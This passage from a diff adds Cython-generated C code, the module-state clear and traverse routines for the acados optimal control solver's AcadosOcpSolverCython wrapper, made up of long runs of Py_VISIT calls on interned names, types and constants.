Py_CLEAR(clear_module_state->__pyx_codeobj__78); + Py_CLEAR(clear_module_state->__pyx_codeobj__80); + Py_CLEAR(clear_module_state->__pyx_codeobj__81); + Py_CLEAR(clear_module_state->__pyx_codeobj__83); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_7cpython_4type_type); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_dtype); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flatiter); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_broadcast); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ndarray); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_generic); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_number); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_integer); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_signedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_inexact); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_floating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_complexfloating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flexible); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_character); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ufunc); + Py_VISIT(traverse_module_state->__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + Py_VISIT(traverse_module_state->__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + Py_VISIT(traverse_module_state->__pyx_array_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_array); + Py_VISIT(traverse_module_state->__pyx_MemviewEnum_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_MemviewEnum); + Py_VISIT(traverse_module_state->__pyx_memoryview_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_memoryview); + Py_VISIT(traverse_module_state->__pyx_memoryviewslice_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_memoryviewslice); + Py_VISIT(traverse_module_state->__pyx_kp_u_); + Py_VISIT(traverse_module_state->__pyx_n_s_ASCII); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___get_poin); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat_3); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___reduce_c); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython__get_poin); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat_3); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_constraint); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_constraint_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_cost_set); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_cost_set_m); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_does_not_s); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_dynamics_g); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_eval_param); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_eval_param_3); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_get); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_get_cost); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_field); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_is_an); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_get_residu); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_stage); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_get_stats); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_load_itera); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_options_se); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_options_se_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_print_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_reset); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_set); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_set_is_not); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_set_mismat); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_set_new_ti); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_solve); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_solve_argu); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_store_iter); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_update_qp); + Py_VISIT(traverse_module_state->__pyx_kp_s_All_dimensions_preceding_dimensi); + Py_VISIT(traverse_module_state->__pyx_n_s_AssertionError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Buffer_view_does_not_expose_stri); + Py_VISIT(traverse_module_state->__pyx_kp_s_Can_only_create_a_buffer_that_is); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_assign_to_read_only_memor); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_create_writable_memory_vi); + Py_VISIT(traverse_module_state->__pyx_kp_u_Cannot_index_with_type); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_transpose_memoryview_with); + Py_VISIT(traverse_module_state->__pyx_kp_s_Dimension_d_is_not_direct); + Py_VISIT(traverse_module_state->__pyx_n_s_Ellipsis); + Py_VISIT(traverse_module_state->__pyx_kp_s_Empty_shape_tuple_for_cython_arr); + Py_VISIT(traverse_module_state->__pyx_n_u_F); + Py_VISIT(traverse_module_state->__pyx_n_s_ImportError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_VISIT(traverse_module_state->__pyx_n_s_IndexError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Index_out_of_bounds_axis_d); + Py_VISIT(traverse_module_state->__pyx_kp_s_Indirect_dimensions_not_supporte); + Py_VISIT(traverse_module_state->__pyx_kp_u_Invalid_mode_expected_c_or_fortr); + Py_VISIT(traverse_module_state->__pyx_kp_u_Invalid_shape_in_axis); + Py_VISIT(traverse_module_state->__pyx_n_s_MemoryError); + Py_VISIT(traverse_module_state->__pyx_kp_s_MemoryView_of_r_at_0x_x); + Py_VISIT(traverse_module_state->__pyx_kp_s_MemoryView_of_r_object); + Py_VISIT(traverse_module_state->__pyx_n_s_N); + Py_VISIT(traverse_module_state->__pyx_kp_u_None); + Py_VISIT(traverse_module_state->__pyx_n_s_NotImplementedError); + Py_VISIT(traverse_module_state->__pyx_n_b_O); + Py_VISIT(traverse_module_state->__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + Py_VISIT(traverse_module_state->__pyx_n_s_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_u_SQP); + Py_VISIT(traverse_module_state->__pyx_n_u_SQP_RTI); + Py_VISIT(traverse_module_state->__pyx_n_s_Sequence); + Py_VISIT(traverse_module_state->__pyx_kp_s_Step_may_not_be_zero_axis_d); + Py_VISIT(traverse_module_state->__pyx_kp_u_TODO); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Unable_to_convert_item_to_object); + Py_VISIT(traverse_module_state->__pyx_n_s_ValueError); + Py_VISIT(traverse_module_state->__pyx_n_s_View_MemoryView); + Py_VISIT(traverse_module_state->__pyx_kp_u_Y_m_d_H_M_S_f); + Py_VISIT(traverse_module_state->__pyx_kp_u__14); + Py_VISIT(traverse_module_state->__pyx_n_u__15); + Py_VISIT(traverse_module_state->__pyx_kp_u__2); + Py_VISIT(traverse_module_state->__pyx_kp_u__29); + Py_VISIT(traverse_module_state->__pyx_n_s__3); + Py_VISIT(traverse_module_state->__pyx_kp_u__6); + Py_VISIT(traverse_module_state->__pyx_kp_u__7); + Py_VISIT(traverse_module_state->__pyx_n_s__84); + Py_VISIT(traverse_module_state->__pyx_n_s_abc); + Py_VISIT(traverse_module_state->__pyx_n_s_acados_template_acados_ocp_solve); + Py_VISIT(traverse_module_state->__pyx_n_s_allocate_buffer); + Py_VISIT(traverse_module_state->__pyx_n_u_alpha); + Py_VISIT(traverse_module_state->__pyx_n_u_alpha_min); + Py_VISIT(traverse_module_state->__pyx_n_u_alpha_reduction); + Py_VISIT(traverse_module_state->__pyx_kp_u_alpha_values_are_not_available_f); + Py_VISIT(traverse_module_state->__pyx_kp_u_and); + Py_VISIT(traverse_module_state->__pyx_n_s_array); + Py_VISIT(traverse_module_state->__pyx_n_s_ascontiguousarray); + Py_VISIT(traverse_module_state->__pyx_n_s_asfortranarray); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_kp_u_at_stage); + Py_VISIT(traverse_module_state->__pyx_n_s_base); + Py_VISIT(traverse_module_state->__pyx_n_s_c); + Py_VISIT(traverse_module_state->__pyx_n_u_c); + Py_VISIT(traverse_module_state->__pyx_n_s_class); + Py_VISIT(traverse_module_state->__pyx_n_s_class_getitem); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_collections); + Py_VISIT(traverse_module_state->__pyx_kp_s_collections_abc); + Py_VISIT(traverse_module_state->__pyx_n_s_constraints_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_constraints_set); + Py_VISIT(traverse_module_state->__pyx_kp_s_contiguous_and_direct); + Py_VISIT(traverse_module_state->__pyx_kp_s_contiguous_and_indirect); + Py_VISIT(traverse_module_state->__pyx_n_s_cost_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_cost_set); + Py_VISIT(traverse_module_state->__pyx_n_s_count); + Py_VISIT(traverse_module_state->__pyx_n_s_datetime); + Py_VISIT(traverse_module_state->__pyx_n_s_default); + Py_VISIT(traverse_module_state->__pyx_n_s_dict); + Py_VISIT(traverse_module_state->__pyx_n_s_dims); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_n_s_double_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_double_value); + Py_VISIT(traverse_module_state->__pyx_n_s_dtype); + Py_VISIT(traverse_module_state->__pyx_n_s_dtype_is_object); + Py_VISIT(traverse_module_state->__pyx_n_s_dump); + Py_VISIT(traverse_module_state->__pyx_n_s_dynamics_get); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_encode); + Py_VISIT(traverse_module_state->__pyx_n_s_enter); + Py_VISIT(traverse_module_state->__pyx_n_s_enumerate); + Py_VISIT(traverse_module_state->__pyx_n_u_eps_sufficient_descent); + Py_VISIT(traverse_module_state->__pyx_n_s_error); + Py_VISIT(traverse_module_state->__pyx_n_s_eval_param_sens); + Py_VISIT(traverse_module_state->__pyx_n_u_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_exit); + Py_VISIT(traverse_module_state->__pyx_n_s_f); + Py_VISIT(traverse_module_state->__pyx_n_s_field); + Py_VISIT(traverse_module_state->__pyx_n_s_field_2); + Py_VISIT(traverse_module_state->__pyx_n_s_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_filename); + Py_VISIT(traverse_module_state->__pyx_n_s_flags); + Py_VISIT(traverse_module_state->__pyx_n_s_float64); + Py_VISIT(traverse_module_state->__pyx_kp_u_for_field); + Py_VISIT(traverse_module_state->__pyx_n_s_format); + Py_VISIT(traverse_module_state->__pyx_n_s_fortran); + Py_VISIT(traverse_module_state->__pyx_n_u_fortran); + Py_VISIT(traverse_module_state->__pyx_n_s_full_stats); + Py_VISIT(traverse_module_state->__pyx_n_u_full_step_dual); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_get); + Py_VISIT(traverse_module_state->__pyx_n_s_get_cost); + Py_VISIT(traverse_module_state->__pyx_n_s_get_pointers_solver); + Py_VISIT(traverse_module_state->__pyx_n_s_get_residuals); + Py_VISIT(traverse_module_state->__pyx_n_s_get_stat_double); + Py_VISIT(traverse_module_state->__pyx_n_s_get_stat_int); + Py_VISIT(traverse_module_state->__pyx_n_s_get_stat_matrix); + Py_VISIT(traverse_module_state->__pyx_n_s_get_stats); + Py_VISIT(traverse_module_state->__pyx_n_s_getcwd); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_u_globalization); + Py_VISIT(traverse_module_state->__pyx_n_u_globalization_use_SOC); + Py_VISIT(traverse_module_state->__pyx_kp_u_got); + Py_VISIT(traverse_module_state->__pyx_kp_u_got_differing_extents_in_dimensi); + Py_VISIT(traverse_module_state->__pyx_n_s_i); + Py_VISIT(traverse_module_state->__pyx_n_s_id); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_n_s_indent); + Py_VISIT(traverse_module_state->__pyx_n_s_index); + Py_VISIT(traverse_module_state->__pyx_n_u_initialize_t_slacks); + Py_VISIT(traverse_module_state->__pyx_n_s_initializing); + Py_VISIT(traverse_module_state->__pyx_n_s_int); + Py_VISIT(traverse_module_state->__pyx_n_s_int_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_int_value); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_isfile); + Py_VISIT(traverse_module_state->__pyx_n_s_itemsize); + Py_VISIT(traverse_module_state->__pyx_kp_s_itemsize_0_for_cython_array); + Py_VISIT(traverse_module_state->__pyx_n_u_iterate); + Py_VISIT(traverse_module_state->__pyx_n_s_join); + Py_VISIT(traverse_module_state->__pyx_n_s_json); + Py_VISIT(traverse_module_state->__pyx_kp_u_json_2); + Py_VISIT(traverse_module_state->__pyx_n_s_key); + Py_VISIT(traverse_module_state->__pyx_n_s_keys); + Py_VISIT(traverse_module_state->__pyx_n_u_lam); + Py_VISIT(traverse_module_state->__pyx_n_u_lam_2); + Py_VISIT(traverse_module_state->__pyx_n_u_lbu); + Py_VISIT(traverse_module_state->__pyx_n_u_lbx); + Py_VISIT(traverse_module_state->__pyx_n_u_line_search_use_sufficient_desce); + Py_VISIT(traverse_module_state->__pyx_n_s_load); + Py_VISIT(traverse_module_state->__pyx_n_s_load_iterate); + Py_VISIT(traverse_module_state->__pyx_kp_u_load_iterate_failed_file_does_no); + Py_VISIT(traverse_module_state->__pyx_n_s_m); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_mem_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_memview); + Py_VISIT(traverse_module_state->__pyx_n_s_min_size); + Py_VISIT(traverse_module_state->__pyx_n_s_mode); + Py_VISIT(traverse_module_state->__pyx_n_s_model_name); + Py_VISIT(traverse_module_state->__pyx_n_s_msg); + Py_VISIT(traverse_module_state->__pyx_n_s_n); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_name_2); + Py_VISIT(traverse_module_state->__pyx_n_s_ndim); + Py_VISIT(traverse_module_state->__pyx_n_s_new); + Py_VISIT(traverse_module_state->__pyx_n_s_new_time_steps); + Py_VISIT(traverse_module_state->__pyx_n_s_nlp_solver_type); + Py_VISIT(traverse_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_VISIT(traverse_module_state->__pyx_n_s_np); + Py_VISIT(traverse_module_state->__pyx_n_s_numpy); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_VISIT(traverse_module_state->__pyx_n_s_nx); + Py_VISIT(traverse_module_state->__pyx_n_s_obj); + Py_VISIT(traverse_module_state->__pyx_n_s_open); + Py_VISIT(traverse_module_state->__pyx_n_s_options_set); + Py_VISIT(traverse_module_state->__pyx_n_s_order); + Py_VISIT(traverse_module_state->__pyx_n_s_os); + Py_VISIT(traverse_module_state->__pyx_n_s_out); + Py_VISIT(traverse_module_state->__pyx_n_s_out_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_out_mat); + Py_VISIT(traverse_module_state->__pyx_n_s_overwrite); + Py_VISIT(traverse_module_state->__pyx_n_u_p); + Py_VISIT(traverse_module_state->__pyx_n_s_pack); + Py_VISIT(traverse_module_state->__pyx_n_s_path); + Py_VISIT(traverse_module_state->__pyx_n_u_pi); + Py_VISIT(traverse_module_state->__pyx_n_u_pi_2); + Py_VISIT(traverse_module_state->__pyx_n_s_pickle); + Py_VISIT(traverse_module_state->__pyx_n_s_print); + Py_VISIT(traverse_module_state->__pyx_n_u_print_level); + Py_VISIT(traverse_module_state->__pyx_n_s_print_statistics); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_checksum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_result); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_type); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_unpickle_Enum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_vtable); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_iter); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_mu0); + Py_VISIT(traverse_module_state->__pyx_n_s_qp_solver_cond_N); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tau_min); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tol_comp); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tol_eq); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tol_ineq); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tol_stat); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_warm_start); + Py_VISIT(traverse_module_state->__pyx_n_u_r); + Py_VISIT(traverse_module_state->__pyx_n_s_range); + Py_VISIT(traverse_module_state->__pyx_n_s_recompute); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_register); + Py_VISIT(traverse_module_state->__pyx_n_b_res_comp); + Py_VISIT(traverse_module_state->__pyx_n_b_res_eq); + Py_VISIT(traverse_module_state->__pyx_n_b_res_ineq); + Py_VISIT(traverse_module_state->__pyx_n_b_res_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_reset); + Py_VISIT(traverse_module_state->__pyx_n_u_residuals); + Py_VISIT(traverse_module_state->__pyx_n_u_rti_phase); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_n_s_set); + Py_VISIT(traverse_module_state->__pyx_n_s_set_new_time_steps); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_shape); + Py_VISIT(traverse_module_state->__pyx_n_s_size); + Py_VISIT(traverse_module_state->__pyx_n_u_sl); + Py_VISIT(traverse_module_state->__pyx_n_u_sl_2); + Py_VISIT(traverse_module_state->__pyx_n_s_solution); + Py_VISIT(traverse_module_state->__pyx_n_s_solve); + Py_VISIT(traverse_module_state->__pyx_kp_u_solver_option_must_be_of_type_fl); + Py_VISIT(traverse_module_state->__pyx_kp_u_solver_option_must_be_of_type_in); + Py_VISIT(traverse_module_state->__pyx_kp_u_solver_option_must_be_of_type_st); + Py_VISIT(traverse_module_state->__pyx_n_s_sort_keys); + Py_VISIT(traverse_module_state->__pyx_n_s_spec); + Py_VISIT(traverse_module_state->__pyx_n_s_split); + Py_VISIT(traverse_module_state->__pyx_n_s_sqp_iter); + Py_VISIT(traverse_module_state->__pyx_n_u_sqp_iter); + Py_VISIT(traverse_module_state->__pyx_n_s_stage); + Py_VISIT(traverse_module_state->__pyx_n_s_start); + Py_VISIT(traverse_module_state->__pyx_n_s_stat_m); + Py_VISIT(traverse_module_state->__pyx_n_u_stat_m); + Py_VISIT(traverse_module_state->__pyx_n_s_stat_n); + Py_VISIT(traverse_module_state->__pyx_n_u_stat_n); + Py_VISIT(traverse_module_state->__pyx_n_u_statistics); + Py_VISIT(traverse_module_state->__pyx_n_s_step); + Py_VISIT(traverse_module_state->__pyx_n_u_step_length); + Py_VISIT(traverse_module_state->__pyx_n_s_stop); + Py_VISIT(traverse_module_state->__pyx_n_s_store_iterate); + Py_VISIT(traverse_module_state->__pyx_n_s_store_iterate_locals_lambda); + Py_VISIT(traverse_module_state->__pyx_kp_u_stored_current_iterate_in); + Py_VISIT(traverse_module_state->__pyx_n_s_strftime); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_direct); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_direct_or_indirect); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_indirect); + Py_VISIT(traverse_module_state->__pyx_n_s_string_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_string_value); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_struct); + Py_VISIT(traverse_module_state->__pyx_n_u_su); + Py_VISIT(traverse_module_state->__pyx_n_u_su_2); + Py_VISIT(traverse_module_state->__pyx_n_s_sys); + Py_VISIT(traverse_module_state->__pyx_n_u_t); + Py_VISIT(traverse_module_state->__pyx_n_u_t_2); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_kp_s_third_party_acados_acados_templa); + Py_VISIT(traverse_module_state->__pyx_n_u_time_glob); + Py_VISIT(traverse_module_state->__pyx_n_u_time_lin); + Py_VISIT(traverse_module_state->__pyx_n_u_time_qp); + Py_VISIT(traverse_module_state->__pyx_n_u_time_qp_solver_call); + Py_VISIT(traverse_module_state->__pyx_n_u_time_qp_xcond); + Py_VISIT(traverse_module_state->__pyx_n_u_time_reg); + Py_VISIT(traverse_module_state->__pyx_n_u_time_sim); + Py_VISIT(traverse_module_state->__pyx_n_u_time_sim_ad); + Py_VISIT(traverse_module_state->__pyx_n_u_time_sim_la); + Py_VISIT(traverse_module_state->__pyx_n_u_time_solution_sensitivities); + Py_VISIT(traverse_module_state->__pyx_n_u_time_tot); + Py_VISIT(traverse_module_state->__pyx_n_u_tol_comp); + Py_VISIT(traverse_module_state->__pyx_n_u_tol_eq); + Py_VISIT(traverse_module_state->__pyx_n_u_tol_ineq); + Py_VISIT(traverse_module_state->__pyx_n_u_tol_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_tolist); + Py_VISIT(traverse_module_state->__pyx_n_u_u); + Py_VISIT(traverse_module_state->__pyx_n_u_u_2); + Py_VISIT(traverse_module_state->__pyx_n_u_ubu); + Py_VISIT(traverse_module_state->__pyx_n_u_ubx); + Py_VISIT(traverse_module_state->__pyx_kp_s_unable_to_allocate_array_data); + Py_VISIT(traverse_module_state->__pyx_kp_s_unable_to_allocate_shape_and_str); + Py_VISIT(traverse_module_state->__pyx_n_s_unpack); + Py_VISIT(traverse_module_state->__pyx_n_s_update); + Py_VISIT(traverse_module_state->__pyx_n_s_update_qp_solver_cond_N); + Py_VISIT(traverse_module_state->__pyx_n_s_utcnow); + Py_VISIT(traverse_module_state->__pyx_kp_u_utf_8); + Py_VISIT(traverse_module_state->__pyx_n_s_value); + Py_VISIT(traverse_module_state->__pyx_n_s_value_2); + Py_VISIT(traverse_module_state->__pyx_n_s_value_shape); + Py_VISIT(traverse_module_state->__pyx_n_s_version_info); + Py_VISIT(traverse_module_state->__pyx_n_u_w); + Py_VISIT(traverse_module_state->__pyx_n_u_warm_start_first_qp); + Py_VISIT(traverse_module_state->__pyx_kp_u_with_dimension); + Py_VISIT(traverse_module_state->__pyx_kp_u_with_dimension_you_have); + Py_VISIT(traverse_module_state->__pyx_n_b_x); + Py_VISIT(traverse_module_state->__pyx_n_s_x); + Py_VISIT(traverse_module_state->__pyx_n_u_x); + Py_VISIT(traverse_module_state->__pyx_n_u_x_2); + Py_VISIT(traverse_module_state->__pyx_n_u_xdot_guess); + Py_VISIT(traverse_module_state->__pyx_n_u_y_ref); + Py_VISIT(traverse_module_state->__pyx_kp_u_you_have); + Py_VISIT(traverse_module_state->__pyx_n_u_yref); + Py_VISIT(traverse_module_state->__pyx_n_u_z); + Py_VISIT(traverse_module_state->__pyx_n_u_z_2); + Py_VISIT(traverse_module_state->__pyx_n_u_z_guess); + Py_VISIT(traverse_module_state->__pyx_n_s_zeros); + Py_VISIT(traverse_module_state->__pyx_int_0); + Py_VISIT(traverse_module_state->__pyx_int_1); + Py_VISIT(traverse_module_state->__pyx_int_2); + Py_VISIT(traverse_module_state->__pyx_int_3); + Py_VISIT(traverse_module_state->__pyx_int_4); + Py_VISIT(traverse_module_state->__pyx_int_6); + Py_VISIT(traverse_module_state->__pyx_int_7); + Py_VISIT(traverse_module_state->__pyx_int_112105877); + Py_VISIT(traverse_module_state->__pyx_int_136983863); + Py_VISIT(traverse_module_state->__pyx_int_184977713); + Py_VISIT(traverse_module_state->__pyx_int_neg_1); + Py_VISIT(traverse_module_state->__pyx_int_neg_5); + Py_VISIT(traverse_module_state->__pyx_slice__5); + Py_VISIT(traverse_module_state->__pyx_tuple__4); + Py_VISIT(traverse_module_state->__pyx_tuple__8); + Py_VISIT(traverse_module_state->__pyx_tuple__9); + Py_VISIT(traverse_module_state->__pyx_slice__16); + Py_VISIT(traverse_module_state->__pyx_tuple__10); + Py_VISIT(traverse_module_state->__pyx_tuple__11); + Py_VISIT(traverse_module_state->__pyx_tuple__12); + Py_VISIT(traverse_module_state->__pyx_tuple__13); + Py_VISIT(traverse_module_state->__pyx_tuple__17); + Py_VISIT(traverse_module_state->__pyx_tuple__18); + Py_VISIT(traverse_module_state->__pyx_tuple__19); + Py_VISIT(traverse_module_state->__pyx_tuple__20); + Py_VISIT(traverse_module_state->__pyx_tuple__21); + Py_VISIT(traverse_module_state->__pyx_tuple__22); + Py_VISIT(traverse_module_state->__pyx_tuple__23); + Py_VISIT(traverse_module_state->__pyx_tuple__24); + Py_VISIT(traverse_module_state->__pyx_tuple__25); + Py_VISIT(traverse_module_state->__pyx_tuple__26); + Py_VISIT(traverse_module_state->__pyx_tuple__27); + Py_VISIT(traverse_module_state->__pyx_tuple__28); + Py_VISIT(traverse_module_state->__pyx_tuple__30); + Py_VISIT(traverse_module_state->__pyx_tuple__31); + Py_VISIT(traverse_module_state->__pyx_tuple__32); + Py_VISIT(traverse_module_state->__pyx_tuple__33); + Py_VISIT(traverse_module_state->__pyx_tuple__34); + Py_VISIT(traverse_module_state->__pyx_tuple__35); + Py_VISIT(traverse_module_state->__pyx_tuple__36); + Py_VISIT(traverse_module_state->__pyx_tuple__37); + Py_VISIT(traverse_module_state->__pyx_tuple__38); + Py_VISIT(traverse_module_state->__pyx_tuple__39); + Py_VISIT(traverse_module_state->__pyx_tuple__41); + Py_VISIT(traverse_module_state->__pyx_tuple__45); + Py_VISIT(traverse_module_state->__pyx_tuple__47); + Py_VISIT(traverse_module_state->__pyx_tuple__49); + Py_VISIT(traverse_module_state->__pyx_tuple__51); + Py_VISIT(traverse_module_state->__pyx_tuple__52); + Py_VISIT(traverse_module_state->__pyx_tuple__55); + Py_VISIT(traverse_module_state->__pyx_tuple__57); + Py_VISIT(traverse_module_state->__pyx_tuple__58); + Py_VISIT(traverse_module_state->__pyx_tuple__60); + Py_VISIT(traverse_module_state->__pyx_tuple__62); + 